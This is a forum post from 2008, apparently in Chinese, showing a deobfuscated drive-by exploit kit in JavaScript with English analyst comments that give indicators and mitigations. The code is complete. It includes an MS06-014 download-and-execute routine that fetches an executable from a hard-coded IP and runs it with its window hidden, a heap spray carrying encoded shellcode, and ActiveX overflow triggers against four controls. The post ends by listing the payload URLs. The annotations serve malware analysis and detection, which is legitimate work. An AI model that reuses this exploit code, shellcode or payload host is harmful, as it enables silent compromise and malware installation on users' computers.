发表于 2008-2-13 18:31:08
经过四五次这样的解密终于看到曙光了!
// Analyst note: returns `len` random lowercase letters drawn from a 25-letter alphabet
// (the string below has no "j"). fLrrULEd uses it to name the dropped executable, so the
// file name differs per victim; the "c:\win????.exe" shape and the download URL are the
// stable indicators, not the name itself.
function AgMzTHLN(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
// Analyst note: object-instantiation helper. `CLSID` is the <object> element created in
// Hbzzp3cv and `name` is a ProgID such as "ADODB.Stream" or "WScript.Shell". Six
// CreateObject/GetObject argument shapes are tried in turn, every exception swallowed,
// until one yields an object; if all fail, r stays null. The eval() wrappers change nothing
// functionally — presumably they exist to defeat simple string matching on CreateObject —
// so "CreateObject" inside eval'd source is itself a useful detection hint.
function LYbEbNdn(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
// Analyst note: synchronous GET of `url` through the XMLHTTP object obtained in Hbzzp3cv.
// Returns the raw responseBody (the downloaded payload bytes), or 0 if open()/send() threw.
// A page script fetching a body that is then handed to ADODB.Stream (e1GueMGv) is the
// classic download-and-execute pattern; the requested URL is the stable indicator.
function MheErtQC(xml, url) {
try {
xml.open("GET", url, false);
xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
// Analyst note: writes `data` to disk as `name` through `o`, an ADODB.Stream instance.
// Type = 1 is adTypeBinary and Mode = 3 is adModeReadWrite; SaveToFile(..., 2) is
// adSaveCreateOverWrite, so an existing file of that name is replaced silently.
// Returns 1 on success, 0 if any step threw. ADODB.Stream.SaveToFile reached from web
// content is worth alerting on by itself; the MS06-014 update (named below the listing)
// closes the route by which this object is obtained.
function e1GueMGv(o, name, data) {
try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }
return 1;
}
// Analyst note: the download-and-execute stage. Fetches `url` with `msxml`, saves the
// bytes as c:\win<4 random letters>.exe via `adobd` (an ADODB.Stream), then launches the
// file: WScript.Shell.Run(name, 0) when flg == 0 (window hidden), otherwise
// Shell.Application.ShellExecute(..., "open", 0). Returns 1 only when the launch call did
// not throw; a failed download or write leaves retval at 0. Defender hooks: process
// creation of a just-written c:\win*.exe with the browser as parent, and a hidden-window
// Run() issued from a script context.
function fLrrULEd(url, msxml, adobd, shell, flg)
{
var retval = 0;
var data = MheErtQC(msxml, url);
if (data != 0) {
var name = "c:\\win"+AgMzTHLN(4)+".exe";
if (e1GueMGv(adobd, name, data) == 1) {
if (flg == 0) {
try {
shell.Run(name, 0);
retval = 1;
} catch(e) { }
} else {
try {
shell.ShellExecute(name, "", "", "open", 0);
retval = 1;
} catch(e) { }
}
}
}
return retval;
}
// Analyst note: MS06-014 driver. Creates an <object> with
// clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 (RDS.DataSpace) and, through it, obtains an
// XMLHTTP object, an ADODB.Stream and a shell object (WScript.Shell, falling back to
// Shell.Application with kIPtJGvM = 1 so fLrrULEd uses ShellExecute instead of Run).
// With all three in hand it calls fLrrULEd against the hard-coded URL with "00" appended
// (xvBv8obL = 1, so the loop runs once). Returns 1 if the payload launched, else 0; every
// exception is swallowed. Indicators: the URL below, and this clsid on a script-created
// <object>. Mitigation is the MS06-014 update the posting names below the listing.
function Hbzzp3cv()
{
var MlyOewkA = new Array(null, null, null); // [XMLHTTP, ADODB.Stream, shell object]
var KbQI7z_C = 0; // result returned to the caller (1 = payload launched)
var GIyycPgl = 'http://79.135.181.138/cgi-bin/in.cgi?0501022602000000003a819343242c14651558d4ef'; // payload URL (indicator)
var xvBv8obL = 1; // number of download attempts
try {
var kIPtJGvM = 0; // 0 = WScript.Shell.Run path, 1 = Shell.Application.ShellExecute path
var F47BCbnI = document.createElement("object");
F47BCbnI.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
if (F47BCbnI) {
MlyOewkA[0] = LYbEbNdn(F47BCbnI, "msxml2.XMLHTTP");
if (! MlyOewkA[0]) MlyOewkA[0] = LYbEbNdn(F47BCbnI, "Microsoft.XMLHTTP");
if (! MlyOewkA[0]) MlyOewkA[0] = LYbEbNdn(F47BCbnI, "MSXML2.ServerXMLHTTP");
MlyOewkA[1] = LYbEbNdn(F47BCbnI, "ADODB.Stream");
MlyOewkA[2] = LYbEbNdn(F47BCbnI, "WScript.Shell");
if (!MlyOewkA[2]) {
MlyOewkA[2] = LYbEbNdn(F47BCbnI, "Shell.Application");
if (MlyOewkA[2]) kIPtJGvM=1;
}
}
if (MlyOewkA[0] && MlyOewkA[1] && MlyOewkA[2]) {
for(var ueAGJzMZ=0;ueAGJzMZ<xvBv8obL;ueAGJzMZ++) {
var YkLGyAyS = fLrrULEd(GIyycPgl+'0'+ueAGJzMZ.toString(), MlyOewkA[0], MlyOewkA[1], MlyOewkA[2], kIPtJGvM);
if (!KbQI7z_C)
KbQI7z_C = YkLGyAyS;
}
}
} catch(e) {}
return KbQI7z_C;
}
// Analyst note: globals shared by the heap-spray stage. gkmpOaTo receives the sprayed
// string (see lCi66Wep); E7I2izyb is a once-only flag so the spray is built a single time.
var gkmpOaTo = new Array();
var E7I2izyb = 0;
// Analyst note: post-spray hook. The self-assignment is a no-op (presumably a reference
// keep-alive or an obfuscation leftover). It then schedules Rk6jx8Mw() after 2 s using a
// string-argument setTimeout. Rk6jx8Mw is not defined anywhere in this listing, so it either
// lives in another part of the page or was stripped before posting — treat it as unknown.
function Cfc5mdEs()
{
gkmpOaTo = gkmpOaTo;
setTimeout("Rk6jx8Mw()", 2000);
}
// Analyst note: grows `szEsNEfd` by repeated self-concatenation until its UTF-16 byte
// length (length*2) reaches T7C9L59q, then trims it to T7C9L59q/2 characters — i.e. to
// exactly T7C9L59q bytes. lCi66Wep uses it to size the padding part of each spray block;
// strings built by doubling like this are a common spray signature.
function cMJI2swV(szEsNEfd, T7C9L59q)
{
while (szEsNEfd.length*2<T7C9L59q)
szEsNEfd += szEsNEfd;
szEsNEfd = szEsNEfd.substring(0,T7C9L59q/2);
return szEsNEfd;
}
// Analyst note: heap-spray stage, run at most once (guarded by E7I2izyb). It decodes a
// %u-encoded shellcode blob, builds a 0x0c0c0c0c padding string so that padding + shellcode
// fills a 0x400000-byte block, and concatenates them in a loop. 0x0c0c0c0c is also the
// value the ActiveX routines below (KskA4zlf, roG6GMCR) pass as a pointer/length, which
// ties the spray to those triggers. Detection: long %u runs fed to unescape(), the
// 0x0c0c0c0c constant, and strings grown by self-concatenation. Always returns 0, so the
// || chain at the bottom of the file moves on to the next exploit.
function lCi66Wep()
{
if (!E7I2izyb) {
var G4FHzuhO = 0x0c0c0c0c; // spray target address
// %u-encoded shellcode; its tail, read as ASCII, is the second URL quoted below the listing.
var oVtm7oAt = unescape("%uf633%u09e9%u0001%u5f00%uc033%u0364%u3040%u0c78" +
"%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34" +
"%u7c40%u688b%u8b3c%u6af7%u5903%u9ce8%u0000%ue200" +
"%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b" +
"%u86e8%u0000%u6800%u3233%u0000%u7568%u6573%u5472" +
"%u16ff%ue88b%u026a%ue859%u006f%u0000%uf9e2%uec83" +
"%u8b20%uc7dc%u6303%u5c3a%uc769%u0443%u666e%u2e6f" +
"%u43c7%u6508%u6578%u6a00%u6a00%u5300%u6a57%uff00" +
"%u0c56%udc8b%u016a%uff53%u0856%u1a6a%u406a%u56ff" +
"%u8b04%uebe8%u5f0c%u006a%u6a57%u5500%u006a%u56ff" +
"%ue814%uffef%uffff%u8b55%u83ec%u0c7d%u750f%ube16" +
"%u0001%u0000%u5aeb%u8b5f%u83f7%u05c6%u006a%u458b" +
"%u5008%u56ff%u3310%u5dc0%u10c2%u5100%u8b56%u3c75" +
"%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149" +
"%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d" +
"%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66" +
"%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359" +
"%ufe83%u7400%ue805%uff9c%uffff%ue8e8%ufffe%u8eff" +
"%u0e4e%uecec%u0397%u980c%u8afe%u360e%u2f1a%u8370" +
"%u5d4f%u60c9%uc308%u68bf%u7474%u3a70%u2f2f%u3937" +
"%u312e%u3533%u312e%u3138%u312e%u3833%u632f%u6967" +
"%u622d%u6e69%u692f%u2e6e%u6763%u3f69%u3530%u3130" +
"%u3230%u3632%u3830%u3030%u3030%u3030%u3030%u6133" +
"%u3138%u3339%u3334%u3432%u6332%u3431%u3536%u3531" +
"%u3835%u3464%u6665%u6200");
var XH5TU1hv = 0x400000; // bytes per spray block
var ZxzTp4AB = oVtm7oAt.length * 2; // shellcode size in bytes
var T7C9L59q = XH5TU1hv - (ZxzTp4AB+0x38); // padding size so padding + shellcode fills one block
var szEsNEfd = unescape("%u0c0c%u0c0c"); // padding unit: two 0x0c0c words
szEsNEfd = cMJI2swV(szEsNEfd,T7C9L59q);
var ZcaPaC4W = (G4FHzuhO - 0x400000)/XH5TU1hv; // block count derived from the target address
for (i=0;i<ZcaPaC4W;i++) { // note: `i` is never declared, so it leaks as a global
gkmpOaTo = szEsNEfd + oVtm7oAt;
}
E7I2izyb = 1;
Cfc5mdEs();
}
return 0;
}
// Analyst note: sets a cookie "id=<XngVIeqz>" on the site (expires in one day, path=/).
// Each exploit routine below calls it with a distinct number just before firing, so the
// cookie records which vector was attempted last — presumably read back server-side, which
// cannot be confirmed from this listing. A cookie named "id" with a small integer value is a
// low-cost indicator for this kit. Errors are swallowed.
function Ut6oudko(XngVIeqz)
{
try {
var oyGH8tVH = new Date();
oyGH8tVH.setDate(oyGH8tVH.getDate() + 1);
document.cookie =
"id=" + XngVIeqz +
"; expires=" + oyGH8tVH.toGMTString() +
"; path=/";
} catch(e) {}
}
// Analyst note: AOL SuperBuddy ActiveX path. Instantiates 'Sb.SuperBuddy', sets cookie
// id=9, and calls LinkSBIcons with 0x0c0c0c0c — the address seeded by the heap spray in
// lCi66Wep. Always returns 0 so the || chain continues. Indicator: ActiveXObject
// 'Sb.SuperBuddy' created from web content; mitigation is the vendor fix or a kill-bit
// for the control.
function KskA4zlf() {
try {
var q3oDUAlQ = new ActiveXObject('Sb.SuperBuddy');
if (q3oDUAlQ) {
Ut6oudko(9);
q3oDUAlQ.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {}
return 0;
}
// Analyst note: creates an <object> with clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC (per
// the posting, the NCTsoft NCTAudioFile2 control), sets cookie id=3, and passes
// SetFormatLikeSample a 4124-character string of 0x0c — an overlong argument aimed at the
// control's buffer handling. Returns undefined (falsy), so the || chain continues.
// Indicator: this clsid on a script-created <object>; mitigation is a kill-bit for the
// control.
function gGGJ5lFo()
{
try {
var Ok0iGRQu = document.createElement("object");
Ok0iGRQu.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
var YQn_bRSC='';
for(var CYwPVdzL=0;CYwPVdzL<4124;CYwPVdzL++)
YQn_bRSC += "\x0c";
Ut6oudko(3);
Ok0iGRQu.SetFormatLikeSample(YQn_bRSC);
} catch(e) { }
}
// Analyst note: GOM Player ActiveX path. Instantiates "GomWebCtrl.GomManager.1", sets
// cookie id=13, and calls OpenURL with a 510-character string of 0x0c bytes instead of a
// URL — again an overlong argument rather than a valid one. Always returns 0. Indicator:
// this ProgID instantiated from web content; mitigation is the vendor fix or a kill-bit.
function QQpcapeF()
{
try {
var VYC2HCqR = new ActiveXObject("GomWebCtrl.GomManager.1");
if (VYC2HCqR) {
var cJrxNpUD='';
var N04rJ6bg=510;
for(var zm3vmdcf=0;zm3vmdcf<N04rJ6bg;zm3vmdcf++)
cJrxNpUD += unescape("%0c");
Ut6oudko(13);
VYC2HCqR.OpenURL(cJrxNpUD);
}
} catch(e) {}
return 0;
}
// Analyst note: WebViewFolderIcon path (a Windows shell control). Sets cookie id=12, then
// up to 128 times creates 'WebViewFolderIcon.WebViewFolderIcon.1' and calls setSlice with
// 0x7ffffffe and three copies of the sprayed address 0x0c0c0c0c, swallowing every throw.
// Always returns 0. The retry loop suggests the author did not have a deterministic
// trigger. Mitigation is the Microsoft update that kill-bits this control (2006-era;
// confirm the exact bulletin against your patch baseline).
function roG6GMCR()
{
Ut6oudko(12);
for (var FT_Uz46R=0;FT_Uz46R<128;FT_Uz46R++)
{
try{
var pjRt1JXS = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
pjRt1JXS.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c);
} catch(e){}
}
return 0;
}
// Analyst note: entry point. The || chain runs the routines left to right and stops at the
// first truthy result. Only Hbzzp3cv can return 1 (payload launched); every other routine
// returns 0 or undefined, so after a failed MS06-014 attempt all remaining vectors fire in
// order: heap spray, SuperBuddy, the 77829F14 control, GOM, WebViewFolderIcon. The empty
// block means the result is discarded.
if (Hbzzp3cv() || lCi66Wep() || KskA4zlf() || gGGJ5lFo() || QQpcapeF() || roG6GMCR()) { }
ms06-014的那个:
http://79.135.181.138/cgi-bin/in.cgi?0501022602000000003a819343242c14651558d4ef
shellcode的那个(据clsid,为NCTsoft NCTAudioFile2 ActiveX控件远程栈溢出漏洞):
http://79.135.181.138/cgi-bin/in.cgi?0501022608000000003a819343242c14651558d4efb